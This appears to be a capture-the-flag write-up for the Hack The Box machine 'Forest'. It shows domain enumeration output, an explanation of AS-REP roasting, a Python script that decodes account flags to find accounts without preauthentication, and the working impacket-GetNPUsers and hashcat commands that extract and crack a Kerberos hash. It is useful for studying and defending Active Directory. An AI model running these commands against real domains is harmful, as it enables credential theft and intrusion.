Group 'Privileged IT Accounts' (RID: 1149) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Exchange Windows Permissions' (RID: 1121) has member: Could not connect to server 10.10.10.161
Group 'Exchange Windows Permissions' (RID: 1121) has member: The username or password was not correct.
Group 'Exchange Windows Permissions' (RID: 1121) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Security Reader' (RID: 1116) has member: Could not connect to server 10.10.10.161
Group 'Security Reader' (RID: 1116) has member: The username or password was not correct.
Group 'Security Reader' (RID: 1116) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Key Admins' (RID: 526) has member: Could not connect to server 10.10.10.161
Group 'Key Admins' (RID: 526) has member: The username or password was not correct.
Group 'Key Admins' (RID: 526) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Organization Management' (RID: 1104) has member: Could not connect to server 10.10.10.161
Group 'Organization Management' (RID: 1104) has member: The username or password was not correct.
Group 'Organization Management' (RID: 1104) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Exchange Servers' (RID: 1118) has member: Could not connect to server 10.10.10.161
Group 'Exchange Servers' (RID: 1118) has member: The username or password was not correct.
Group 'Exchange Servers' (RID: 1118) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Users' (RID: 513) has member: Could not connect to server 10.10.10.161
Group 'Domain Users' (RID: 513) has member: The username or password was not correct.
Group 'Domain Users' (RID: 513) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'test' (RID: 5101) has member: Could not connect to server 10.10.10.161
Group 'test' (RID: 5101) has member: The username or password was not correct.
Group 'test' (RID: 5101) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Discovery Management' (RID: 1111) has member: Could not connect to server 10.10.10.161
Group 'Discovery Management' (RID: 1111) has member: The username or password was not correct.
Group 'Discovery Management' (RID: 1111) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'DnsUpdateProxy' (RID: 1102) has member: Could not connect to server 10.10.10.161
Group 'DnsUpdateProxy' (RID: 1102) has member: The username or password was not correct.
Group 'DnsUpdateProxy' (RID: 1102) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: Could not connect to server 10.10.10.161
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: The username or password was not correct.
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Computers' (RID: 515) has member: Could not connect to server 10.10.10.161
Group 'Domain Computers' (RID: 515) has member: The username or password was not correct.
Group 'Domain Computers' (RID: 515) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Compliance Management' (RID: 1115) has member: Could not connect to server 10.10.10.161
Group 'Compliance Management' (RID: 1115) has member: The username or password was not correct.
Group 'Compliance Management' (RID: 1115) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'View-Only Organization Management' (RID: 1106) has member: Could not connect to server 10.10.10.161
Group 'View-Only Organization Management' (RID: 1106) has member: The username or password was not correct.
Group 'View-Only Organization Management' (RID: 1106) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Read-only Domain Controllers' (RID: 521) has member: Could not connect to server 10.10.10.161
Group 'Read-only Domain Controllers' (RID: 521) has member: The username or password was not correct.
Group 'Read-only Domain Controllers' (RID: 521) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Protected Users' (RID: 525) has member: Could not connect to server 10.10.10.161
Group 'Protected Users' (RID: 525) has member: The username or password was not correct.
Group 'Protected Users' (RID: 525) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Enterprise Read-only Domain Controllers' (RID: 498) has member: Could not connect to server 10.10.10.161
Group 'Enterprise Read-only Domain Controllers' (RID: 498) has member: The username or password was not correct.
Group 'Enterprise Read-only Domain Controllers' (RID: 498) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Server Management' (RID: 1112) has member: Could not connect to server 10.10.10.161
Group 'Server Management' (RID: 1112) has member: The username or password was not correct.
Group 'Server Management' (RID: 1112) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Controllers' (RID: 516) has member: Could not connect to server 10.10.10.161
Group 'Domain Controllers' (RID: 516) has member: The username or password was not correct.
Group 'Domain Controllers' (RID: 516) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Help Desk' (RID: 1109) has member: Could not connect to server 10.10.10.161
Group 'Help Desk' (RID: 1109) has member: The username or password was not correct.
Group 'Help Desk' (RID: 1109) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Delegated Setup' (RID: 1113) has member: Could not connect to server 10.10.10.161
Group 'Delegated Setup' (RID: 1113) has member: The username or password was not correct.
Group 'Delegated Setup' (RID: 1113) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Service Accounts' (RID: 1148) has member: Could not connect to server 10.10.10.161
Group 'Service Accounts' (RID: 1148) has member: The username or password was not correct.
Group 'Service Accounts' (RID: 1148) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Guests' (RID: 514) has member: Could not connect to server 10.10.10.161
Group 'Domain Guests' (RID: 514) has member: The username or password was not correct.
Group 'Domain Guests' (RID: 514) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Managed Availability Servers' (RID: 1120) has member: Could not connect to server 10.10.10.161
Group 'Managed Availability Servers' (RID: 1120) has member: The username or password was not correct.
Group 'Managed Availability Servers' (RID: 1120) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Hygiene Management' (RID: 1114) has member: Could not connect to server 10.10.10.161
Group 'Hygiene Management' (RID: 1114) has member: The username or password was not correct.
Group 'Hygiene Management' (RID: 1114) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Enterprise Key Admins' (RID: 527) has member: Could not connect to server 10.10.10.161
Group 'Enterprise Key Admins' (RID: 527) has member: The username or password was not correct.
Group 'Enterprise Key Admins' (RID: 527) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Cloneable Domain Controllers' (RID: 522) has member: Could not connect to server 10.10.10.161
Group 'Cloneable Domain Controllers' (RID: 522) has member: The username or password was not correct.
Group 'Cloneable Domain Controllers' (RID: 522) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Records Management' (RID: 1110) has member: Could not connect to server 10.10.10.161
Group 'Records Management' (RID: 1110) has member: The username or password was not correct.
Group 'Records Management' (RID: 1110) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Public Folder Management' (RID: 1107) has member: Could not connect to server 10.10.10.161
Group 'Public Folder Management' (RID: 1107) has member: The username or password was not correct.
Group 'Public Folder Management' (RID: 1107) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Schema Admins' (RID: 518) has member: Could not connect to server 10.10.10.161
Group 'Schema Admins' (RID: 518) has member: The username or password was not correct.
Group 'Schema Admins' (RID: 518) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Security Administrator' (RID: 1117) has member: Could not connect to server 10.10.10.161
Group 'Security Administrator' (RID: 1117) has member: The username or password was not correct.
Group 'Security Administrator' (RID: 1117) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Enterprise Admins' (RID: 519) has member: Could not connect to server 10.10.10.161
Group 'Enterprise Admins' (RID: 519) has member: The username or password was not correct.
Group 'Enterprise Admins' (RID: 519) has member: Connection failed: NT_STATUS_LOGON_FAILURE
=======================================================================
| Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
=============================================
| Getting printer info for 10.10.10.161 |
=============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Thu Dec 16 12:57:44 2021
------------------------------------------------
ENUM4LINUX - next generation
==========================
| Target Information |
==========================
[*] Target ........... 10.10.10.161
[*] Username ......... ''
[*] Random Username .. 'ehriiael'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
====================================
| Service Scan on 10.10.10.161 |
====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
====================================================
| Domain Information via LDAP for 10.10.10.161 |
====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: htb.local
====================================================
| NetBIOS Names and Workgroup for 10.10.10.161 |
====================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
=========================================
| SMB Dialect Check on 10.10.10.161 |
=========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: true
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB1 only: false
Preferred dialect: SMB 3.0
SMB signing required: true
=========================================
| RPC Session Check on 10.10.10.161 |
=========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user session
[-] Could not establish random user session: STATUS_LOGON_FAILURE
===================================================
| Domain Information via RPC for 10.10.10.161 |
===================================================
[+] Domain: HTB
[+] SID: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
===========================================================
| Domain Information via SMB session for 10.10.10.161 |
===========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: FOREST
NetBIOS domain name: HTB
DNS domain: htb.local
FQDN: FOREST.htb.local
===============================================
| OS Information via RPC for 10.10.10.161 |
===============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows Server 2016 Standard 14393
OS version: '10.0'
OS release: '1607'
OS build: '14393'
Native OS: Windows Server 2016 Standard 14393
Native LAN manager: Windows Server 2016 Standard 6.3
Platform id: null
Server type: null
Server type string: null
=====================================
| Users via RPC on 10.10.10.161 |
=====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 31 users via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 31 users via 'enumdomusers'
[+] After merging user results we have 31 users total:
'1123':
username: $331000-VK4ADACQNUCA
name: (null)
acb: '0x00020015'
description: (null)
'1124':
username: SM_2c8eef0a09b545acb
name: Microsoft Exchange Approval Assistant
acb: '0x00020011'
description: (null)
'1125':
username: SM_ca8c2ed5bdab4dc9b
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1126':
username: SM_75a538d3025e4db9a
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1127':
username: SM_681f53d4942840e18
name: Discovery Search Mailbox
acb: '0x00020011'
description: (null)
'1128':
username: SM_1b41c9286325456bb
name: Microsoft Exchange Migration
acb: '0x00020011'
description: (null)
'1129':
username: SM_9b69f1b9d2cc45549
name: Microsoft Exchange Federation Mailbox
acb: '0x00020011'
description: (null)
'1130':
username: SM_7c96b981967141ebb
name: E4E Encryption Store - Active
acb: '0x00020011'
description: (null)
'1131':
username: SM_c75ee099d0a64c91b
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1132':
username: SM_1ffab36a2f5f479cb
name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
acb: '0x00020011'
description: (null)
'1134':
username: HealthMailboxc3d7722
name: HealthMailbox-EXCH01-Mailbox-Database-1118319013
acb: '0x00000210'
description: (null)
'1135':
username: HealthMailboxfc9daad
name: HealthMailbox-EXCH01-001
acb: '0x00000210'
description: (null)
'1136':
username: HealthMailboxc0a90c9
name: HealthMailbox-EXCH01-002
acb: '0x00000210'
description: (null)
'1137':
username: HealthMailbox670628e
name: HealthMailbox-EXCH01-003
acb: '0x00000210'
description: (null)
'1138':
username: HealthMailbox968e74d
name: HealthMailbox-EXCH01-004
acb: '0x00000210'
description: (null)
'1139':
username: HealthMailbox6ded678
name: HealthMailbox-EXCH01-005
acb: '0x00000210'
description: (null)
'1140':
username: HealthMailbox83d6781
name: HealthMailbox-EXCH01-006
acb: '0x00000210'
description: (null)
'1141':
username: HealthMailboxfd87238
name: HealthMailbox-EXCH01-007
acb: '0x00000210'
description: (null)
'1142':
username: HealthMailboxb01ac64
name: HealthMailbox-EXCH01-008
acb: '0x00000210'
description: (null)
'1143':
username: HealthMailbox7108a4e
name: HealthMailbox-EXCH01-009
acb: '0x00000210'
description: (null)
'1144':
username: HealthMailbox0659cc1
name: HealthMailbox-EXCH01-010
acb: '0x00000210'
description: (null)
'1145':
username: sebastien
name: Sebastien Caron
acb: '0x00000210'
description: (null)
'1146':
username: lucinda
name: Lucinda Berger
acb: '0x00000210'
description: (null)
'1147':
username: svc-alfresco
name: svc-alfresco
acb: '0x00010210'
description: (null)
'1150':
username: andy
name: Andy Hislip
acb: '0x00000210'
description: (null)
'1151':
username: mark
name: Mark Brandt
acb: '0x00000210'
description: (null)
'1152':
username: santi
name: Santi Rodriguez
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: Administrator
acb: '0x00000010'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00000011'
description: Key Distribution Center Service Account
'503':
username: DefaultAccount
name: (null)
acb: '0x00000215'
description: A user account managed by the system.
======================================
| Groups via RPC on 10.10.10.161 |
======================================
[*] Enumerating local groups
[+] Found 5 groups via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 29 groups via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 38 groups via 'enumdomgroups'
[+] After merging groups results we have 72 groups total:
'1101':
groupname: DnsAdmins
type: local
'1102':
groupname: DnsUpdateProxy
type: domain
'1104':
groupname: Organization Management
type: domain
'1105':
groupname: Recipient Management
type: domain
'1106':
groupname: View-Only Organization Management
type: domain
'1107':
groupname: Public Folder Management
type: domain
'1108':
groupname: UM Management
type: domain
'1109':
groupname: Help Desk
type: domain
'1110':
groupname: Records Management
type: domain
'1111':
groupname: Discovery Management
type: domain
'1112':
groupname: Server Management
type: domain
'1113':
groupname: Delegated Setup
type: domain
'1114':
groupname: Hygiene Management
type: domain
'1115':
groupname: Compliance Management
type: domain
'1116':
groupname: Security Reader
type: domain
'1117':
groupname: Security Administrator
type: domain
'1118':
groupname: Exchange Servers
type: domain
'1119':
groupname: Exchange Trusted Subsystem
type: domain
'1120':
groupname: Managed Availability Servers
type: domain
'1121':
groupname: Exchange Windows Permissions
type: domain
'1122':
groupname: ExchangeLegacyInterop
type: domain
'1133':
groupname: $D31000-NSEL5BRJ63V7
type: domain
'1148':
groupname: Service Accounts
type: domain
'1149':
groupname: Privileged IT Accounts
type: domain
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'5101':
groupname: test
type: domain
'512':
groupname: Domain Admins
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'516':
groupname: Domain Controllers
type: domain
'517':
groupname: Cert Publishers
type: local
'518':
groupname: Schema Admins
type: domain
'519':
groupname: Enterprise Admins
type: domain
'520':
groupname: Group Policy Creator Owners
type: domain
'521':
groupname: Read-only Domain Controllers
type: domain
'522':
groupname: Cloneable Domain Controllers
type: domain
'525':
groupname: Protected Users
type: domain
'526':
groupname: Key Admins
type: domain
'527':
groupname: Enterprise Key Admins
type: domain
'544':
groupname: Administrators
type: builtin
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'548':
groupname: Account Operators
type: builtin
'549':
groupname: Server Operators
type: builtin
'550':
groupname: Print Operators
type: builtin
'551':
groupname: Backup Operators
type: builtin
'552':
groupname: Replicator
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
'575':
groupname: RDS Remote Access Servers
type: builtin
'576':
groupname: RDS Endpoint Servers
type: builtin
'577':
groupname: RDS Management Servers
type: builtin
'578':
groupname: Hyper-V Administrators
type: builtin
'579':
groupname: Access Control Assistance Operators
type: builtin
'580':
groupname: Remote Management Users
type: builtin
'581':
groupname: System Managed Accounts Group
type: builtin
'582':
groupname: Storage Replica Administrators
type: builtin
======================================
| Shares via RPC on 10.10.10.161 |
======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
=========================================
| Policies via RPC for 10.10.10.161 |
=========================================
[*] Trying port 445/tcp
[+] Found policy:
domain_password_information:
pw_history_length: 24
min_pw_length: 7
min_pw_age: 1 day 4 minutes
max_pw_age: not set
pw_properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
domain_lockout_information:
lockout_observation_window: 30 minutes
lockout_duration: 30 minutes
lockout_threshold: None
domain_logoff_information:
force_logoff_time: not set
=========================================
| Printers via RPC for 10.10.10.161 |
=========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 21.96 seconds
Using the list of usernames we gathered previously, we can try AS-REP roasting. Here's a short blurb about AS-REP roasting:
The attack has two parts; the first is requesting an AS-REP ticket from the Domain Controller (or more specifically, the KDC). If pre-authentication is disabled for that account, the KDC will disclose whether a user with the given username exists and, if so, supply a piece of data encrypted with the user's password. Many people will habitually correct this to say "Well actually, you mean hashed, not encrypted!", however in this instance encrypted is correct, as can be seen in RFC 4120. The encrypted part is signed with the client key, which allows us to perform a brute-force attack to determine the user's password. Performing the attack is possible either with Impacket or Rubeus.
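The "pre-authentication is disabled" condition the blurb describes is a per-account flag, and the enum4linux-ng output above already exposes it: the `acb` value printed for each user is the SAMR account-control bit field, and bit 0x00010000 is DONT_REQUIRE_PREAUTH. The following is an added example (not code from the write-up or from enum4linux-ng) that parses those user records and decodes the flags, so an auditor can see which accounts are exposed to AS-REP roasting, and which are disabled or have no password required, before touching Kerberos at all. The flag names follow Samba's ACB_* constants (the same bits as USER_ACCOUNT_CONTROL in MS-SAMR); the sample records are constructed from values shown in the output above.

```python
"""Decode the 'acb' account-control bits in enum4linux-ng user records.

Added example for this write-up; not part of enum4linux-ng itself.
Flag names are Samba's ACB_* constants (MS-SAMR USER_ACCOUNT_CONTROL bits).
"""
import re
from typing import Dict, List

# SAMR account control bits as Samba names them (enum4linux-ng gets them via rpcclient).
ACB_FLAGS = {
    0x00000001: "ACB_DISABLED",
    0x00000002: "ACB_HOMDIRREQ",
    0x00000004: "ACB_PWNOTREQ",
    0x00000008: "ACB_TEMPDUP",
    0x00000010: "ACB_NORMAL",
    0x00000020: "ACB_MNS",
    0x00000040: "ACB_DOMTRUST",
    0x00000080: "ACB_WSTRUST",
    0x00000100: "ACB_SVRTRUST",
    0x00000200: "ACB_PWNOEXP",
    0x00000400: "ACB_AUTOLOCK",
    0x00000800: "ACB_ENC_TXT_PWD_ALLOWED",
    0x00001000: "ACB_SMARTCARD_REQUIRED",
    0x00002000: "ACB_TRUSTED_FOR_DELEGATION",
    0x00004000: "ACB_NOT_DELEGATED",
    0x00008000: "ACB_USE_DES_KEY_ONLY",
    0x00010000: "ACB_DONT_REQUIRE_PREAUTH",  # the bit that makes AS-REP roasting possible
    0x00020000: "ACB_PW_EXPIRED",
    0x00040000: "ACB_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION",
    0x00080000: "ACB_NO_AUTH_DATA_REQD",
    0x00100000: "ACB_PARTIAL_SECRETS_ACCOUNT",
    0x00200000: "ACB_USE_AES_KEYS",
}

# Constructed sample: a subset of the records printed by enum4linux-ng above.
SAMPLE = """
'1123':
  username: $331000-VK4ADACQNUCA
  name: (null)
  acb: '0x00020015'
  description: (null)
'1124':
  username: SM_2c8eef0a09b545acb
  name: Microsoft Exchange Approval Assistant
  acb: '0x00020011'
  description: (null)
'1145':
  username: sebastien
  name: Sebastien Caron
  acb: '0x00000210'
  description: (null)
'1147':
  username: svc-alfresco
  name: svc-alfresco
  acb: '0x00010210'
  description: (null)
'500':
  username: Administrator
  name: Administrator
  acb: '0x00000010'
  description: Built-in account for administering the computer/domain
'501':
  username: Guest
  name: (null)
  acb: '0x00000215'
  description: Built-in account for guest access to the computer/domain
'502':
  username: krbtgt
  name: (null)
  acb: '0x00000011'
  description: Key Distribution Center Service Account
"""

RECORD_RE = re.compile(r"^\s*'(\d+)':\s*$")
FIELD_RE = re.compile(r"^\s*(username|name|acb|description):\s*(.*?)\s*$")


def parse_enum4linux_ng_users(text: str) -> List[Dict]:
    """Turn the 'Users via RPC' block into a list of {rid, username, acb, ...} dicts."""
    users: List[Dict] = []
    current = None
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:  # a quoted RID starts a new record
            current = {"rid": int(m.group(1))}
            users.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            key, value = m.groups()
            current[key] = int(value.strip("'\""), 16) if key == "acb" else value
    return users


def decode_acb(acb: int) -> List[str]:
    """Expand a SAMR acb value into flag names (lowest bit first)."""
    names = [name for bit, name in ACB_FLAGS.items() if acb & bit]
    unknown = acb & ~sum(ACB_FLAGS)  # bits this table does not know about
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:08x}")
    return names


def audit(users: List[Dict]) -> Dict[str, List[str]]:
    """Group usernames by the account-control conditions an auditor cares about."""
    findings = {"preauth_not_required": [], "disabled": [], "password_not_required": []}
    for u in users:
        flags = decode_acb(u.get("acb", 0))
        if "ACB_DISABLED" in flags:
            findings["disabled"].append(u["username"])
        elif "ACB_DONT_REQUIRE_PREAUTH" in flags:  # only enabled accounts are roastable
            findings["preauth_not_required"].append(u["username"])
        if "ACB_PWNOTREQ" in flags:
            findings["password_not_required"].append(u["username"])
    return findings


if __name__ == "__main__":
    for u in parse_enum4linux_ng_users(SAMPLE):
        print(f"{u['rid']:>5} {u['username']:<24} {' | '.join(decode_acb(u['acb']))}")
    print(audit(parse_enum4linux_ng_users(SAMPLE)))
```

Run against the sample, svc-alfresco is the only enabled account carrying ACB_DONT_REQUIRE_PREAUTH, which is exactly what GetNPUsers confirms further down; the disabled Exchange system mailboxes and Guest show up under the other headings. Remediation is the mirror image of the check: clear the "Do not require Kerberos preauthentication" option on any enabled account that has it, and treat service accounts with non-expiring passwords as candidates for strong, rotated credentials.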
Here I am running impacket-GetNPUsers against the forest.htb domain controller in the htb.local/ domain. We're also passing -outputfile and -format so that we save the found hashes, in hashcat format. -no-pass is helpful so that we're not prompted for a password, since we don't have one anyway.
$ impacket-GetNPUsers -outputfile hashes.txt -format hashcat -usersfile usernames -dc-ip forest.htb -no-pass htb.local/ | tee 10.10.10.161.$(basename $PWD).impacket-getnpusers.txt
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
We were able to recover a Kerberos hash. From here we can identify the hashcat mode for it and then crack the hash with hashcat:
$ nth -af hashes.txt | tail -3
Most Likely
Kerberos 5 AS-REP etype 23, HC: 18200 JtR: krb5pa-sha1 Summary: Used for Windows Active Directory
$ hashcat --show -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
[email protected]:1e708e6ce68f79c142a742ba8ec07754$03a859b16e325ff3c223485dfd613c7bb1fc28769cb05cc48ca76fbe9f9e751674b76c125743f3a93ca80512003ad30694a7f73689c7be9d64616d3e767a4ea9cd393006ffb21136d0c2ad032624f2c7e5ecb8a4f72ad9d91b4084299384e3f16e31fcd2916f1bef2ec9dd8bae2ba33e3dadf3c0b3a12751eef81ac3c73b0bb64104a6e2e7dbc7531661f2ae269f78e1c6c15b1fdbda5d2c2410badccde237ef50ef967365f7db182a291d2c530cbd8576ce7bb18081af005a89cb6b325572e022b169e78dbf93fcdf5cf14b29a07634dcb870219ed72b3143ea2a08763e72cc860d8e8ff015:r3dacted
From here I am going to try to use evil-winrm to connect and run scripts on the remote machine with the credentials we got.